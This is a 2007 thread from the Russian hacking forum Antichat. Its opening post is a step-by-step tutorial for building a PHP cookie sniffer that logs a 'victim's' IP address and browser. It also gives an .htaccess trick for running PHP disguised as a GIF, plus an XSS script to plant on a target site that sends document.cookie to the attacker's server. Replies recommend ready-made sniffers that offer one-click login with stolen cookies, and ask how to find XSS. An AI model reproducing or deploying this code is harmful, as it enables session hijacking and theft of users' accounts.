Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
11.09.2007, 00:14
|
|
Познавший АНТИЧАТ
Регистрация: 07.01.2007
Сообщений: 1,263
Провел на форуме:
3326855
Репутация:
702
|
|
Пишем свой Php сниффер
Многие, скорее всего, пользовались ачатовским сниффером. Многие знали как он работает, многие даже не догадывались. Вот для вторых и предназначена эта статья. В этой статье гуру ачата и профи программеры ничего нового для себя не найдут.
Итак, начнём. Для начала теория. Что такое сниффер?
Цитата из википедии
Анализатор трафика, или снифер (от англ. to sniff — нюхать) — сетевой анализатор трафика, программа или программно-аппаратное устройство, предназначенное для перехвата и последующего анализа, либо только анализа сетевого трафика, предназначенного для других узлов.
Мы будем писать скрипт, который позволяет получать какие-то сведения о тех, кто заходит к вам на страницу.
Какие сведения можно получать сниффером? Да почти любые, начиная от IP адреса жертвы, заканчивая coockies.
Зачем это надо? Если у вас возник такой вопрос, то эта статья, скорее всего, вам не пригодиться. Итак, поехали...
Что нам надо для создания собственного сниффера? - мозг и ровные руки
- хостинг с поддержкой PHP
Для начала повторюсь. Задачей нашего сниффера будет сбор информации о жертве, зашедшей на наш сайт и сохранение этой информации в файле.
Создаём 2 файла - sniff.php и log.txt
Заполняем файл sniff.php. Для понимая того, что мы делаем, мы будем сейчас работать со стандартными переменнымы.
Переменная file будет хранить название и путь к файлу log.txt, нашему файлу с результатами:
$file=”log.txt”;
Теперь объявим переменные, в которых будет хранится информация о дате и времени посещения страницы.
PHP код:
$data=date("D.M.Y"); //в скобках прописан формат отображения даты D - день недели, M - месяц Y - год.
$time=date("h:i"); //в скобках прописан формат отображения времени h - часы, i - минуты
Теперь нам нужно собрать инфрмацию о посетителе. Что может лучше описать посетителя, чем его IP адресс и информация о системе?
PHP код:
$ip=trim($_SERVER['REMOTE_ADDR']);
$sysinfo=trim($_SERVER['HTTP_USER_AGENT']);
// это стандартные переменные, которые автоматом принимает сервер
Теперь пишем основной код
PHP код:
if(is_file($file)){ //Проверяем наличие файла и возможность работы с ним
$fo=fopen($file,"a"); //Открываем файл на запись в конец
$res="$data | $time | $ip | $sysinfo \n"; //Формируем строку с информацией от жертвы
//в формате дата|время|ip-адрес|характеристика системы
//переход на следующую строку n
$fw=fwrite($fo,$res); //Записываем в файл
fclose($fo); //Закрываем файл
}
Сниффер готов. Заливаем его на любой хост с PHP и проверяем его работу. Заходим на страницу sniff.php и видим белый экран без ошибок - значит всё сделали правильно. Теперь смотрим содержимое файла log.txt. Оно должно быть примерно следующего содержания:
10.09.2007 | 22:45 | 127.0.0.1 | Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Что теперь с ним делать? Да ничего почти. Для серьёзных вещей он не подходит. Для серьёзных и интересных вещей нам нужно уметь пользоваться куками. Что такое cookies?
HTTP-Cookies или Куки (от англ. cookies — домашнее печенье), иногда используется сленговый синоним — «плюшки». — служебная информации, посылаемая веб-сервером на компьютер пользователя, для сохранения в браузере. Применяется для сохранения данных, специфичных для данного пользователя, и используемых веб-сервером для различных целей, в числе которых:
* в системах с удаленным доступом — пароль, порождаемый сервером при первом подключении и отсылаемый пользователю; при последующих подключениях пользователь должен предоставлять серверу этот пароль
* отслеживание состояния сессии
Так что всё в ваших руках... Юзаем свой мозг и гугль, совершенствуемся...
Для тех, кому лень это делать продолжаю статью.
Для того, чтобы украсть чужие куки нам нелбходимо: - всё, что нужно было для создания простого сниффера
Для начала создадим картинку, размером 1х1 пиксель(для примера). Далее, в файл sniff.php добавляем переменную
PHP код:
$query=trim($HTTP_GET_VARS['cook']);
Не забываем добавить эту переменную на запись в файл
PHP код:
$res="$data | $time | $ip | $sysinfo \n $query \n"; //Формируем строку с информацией от жертвы
Так же отображаем нашу 1х1 картинку:
PHP код:
Header("Content-type: image/png");
$im = ImageCreateFromGif("путь_к_вашей_картинке");
ImageGif($im);
ImageDestroy($im);
Переименовываем наш sniff.php в sniff.gif и создаём на серваке файл .htaccess со следующем текстом:
AddType application/x-httpd-php .gif
Теперь пишем скрипт, который будет находиться на сайте жертвы, и передавать нам с него все куки:
Код HTML:
<script>img = new Image(); img.src = "http://путь_к_вашему_снифферу/sniff.gif?cook='+document.cookie;</script>
В этом скрипте мы получаем куки и отправляем их нашему скрипту в переменной cook.
Проверяем работу скрипта. Писал без кофе и пива, так что мог что-то забыть. Почитаю коментарии и доделаю статью с утра. Всем спасибо.
Последний раз редактировалось inlanger; 11.09.2007 в 00:47..
|
|
|
11.09.2007, 02:55
|
|
Banned
Регистрация: 10.07.2005
Сообщений: 224
Провел на форуме:
1062041
Репутация:
50
|
|
а модераторы сего раздела в отпуске или "пишут свой сниффер?".
---Модераторы смотрят отзывы. И твой в том числе. Что то я конструктивной критики лично в твоем посте не наблюдаю. Посмотрим что еще скажут люди.
Alexsize
+ 5 Alexsize
-=lebed=-
Последний раз редактировалось -=lebed=-; 25.12.2007 в 10:26..
|
|
|
|
11.09.2007, 15:08
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Сообщение от inlanger
я видел,что там их полно. но нет ни одного описания как они работают.
Хочешь сказать у тебя есть описание как они работают? По программной части может и есть, а вот как происходит передача кук из твоего поста я например непонял... Он перехватывает куки, как?! Нет объяснения, что при загрузке скрипта браузером с нашего сервера где сниффер, грузится картинка с параметрами кукисов, которые получаются из функции жаваскрипта document.cookie и т.д. и т.п. и поехали дальше... 
|
|
|
|
11.09.2007, 17:35
|
|
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
Провел на форуме:
5302668
Репутация:
2054
|
|
омг, очередной пятиколёсный велосипед =\
сниф каника рулит, как ни крути!!! - http://kanick.ru/sniffer/
описалово:
Вот краткий обзор функционала сниффера:
* красивый, интуитивно понятный интерфейс, в котором всё учтено
* поддержка всех известных браузеров
* система фильтров, позволяющая отбирать из лога только нужные записи
* фильтрация запросов (еще до попадения в лог)
* функция “Волшебная палочка”, позволяющая быстро заходить на сайт с украденными cookies
* удаление отмеченных записей
* помечание новых записей
* возможность авторизованного доступа
* отправка оповещений на e-mail, ICQ — new!
* поддержка различных стилей оформления (4 стиля в комплекте)
* совместимость с предыдущими версиями (достаточно перенести файл data.txt)
* экспорт (сохранение) данных — new!
* подробный FAQ
…и многое другое.
я видел,что там их полно. но нет ни одного описания как они работают.
+ http://old.antichat.ru/sniff/
ещё можно почитать:
http://old.antichat.ru/txt/old/cookie.shtml
http://old.antichat.ru/crackchat/HTML/
и
http://old.antichat.ru/txt/utf7/
__________________
Лучший способ защиты - это нападение!!!
Последний раз редактировалось TANZWUT; 11.09.2007 в 17:43..
Причина: Добавления
|
|
|
|
11.09.2007, 17:42
|
|
IQ- 137%
Регистрация: 15.06.2004
Сообщений: 441
Провел на форуме:
1212666
Репутация:
662
|
|
Не ф тему просто так получилось)Щас поднимаю веб сервак и скачиваю все нужные мне дистрибитивы.Так вот к чему пишу то ,все уже в курсе что четвертая ветка умерает в конце этого года и официально поддерживаться больше не будет))
__________________
|
|
|
|
16.10.2007, 04:27
|
|
Познающий
Регистрация: 22.01.2007
Сообщений: 32
Провел на форуме:
214445
Репутация:
0
|
|
Почему?
Делал всё как ты писал! - Чё-то вообще ничего не работает.. 
Скачал "php Based Sniffer [phpBS] v2.xx © Kanick 2005 Модифицирован АНТИЧАТ.РУ" - Всё в норме... Не могу разобраться почему? |
|
|
|
16.10.2007, 05:21
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705
Репутация:
1403
|
|
Поиск по сайту не дал подробного описания снифферов. Вот и написал...
как отдельной статьи нет... Но в других темах дохуя мануалов по написанию сниффера...
|
|
|
|
16.10.2007, 05:42
|
|
Познающий
Регистрация: 22.01.2007
Сообщений: 32
Провел на форуме:
214445
Репутация:
0
|
|
Как...
http://video.antichat.ru/file232.html
"Я нашол в течене 30 минут"
А как искать xss? Та, которая на видео больше не пашет... |
|
|
|
21.10.2007, 23:06
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
лол чувак этих статей по нету целая куча можно просто взять какой нить готовый снифер и вписать туда немногго своих функции и сделать интерфейс покасивее
|
|
|
|
21.10.2007, 23:11
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
да и еще одно ты быхоть когда статью писал изменил бы немногоскрипт
$res="$data | $time | $ip | $sysinfo \n $query \n"; // а то вот это уж больно знакомое
копираиты лучше дай
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
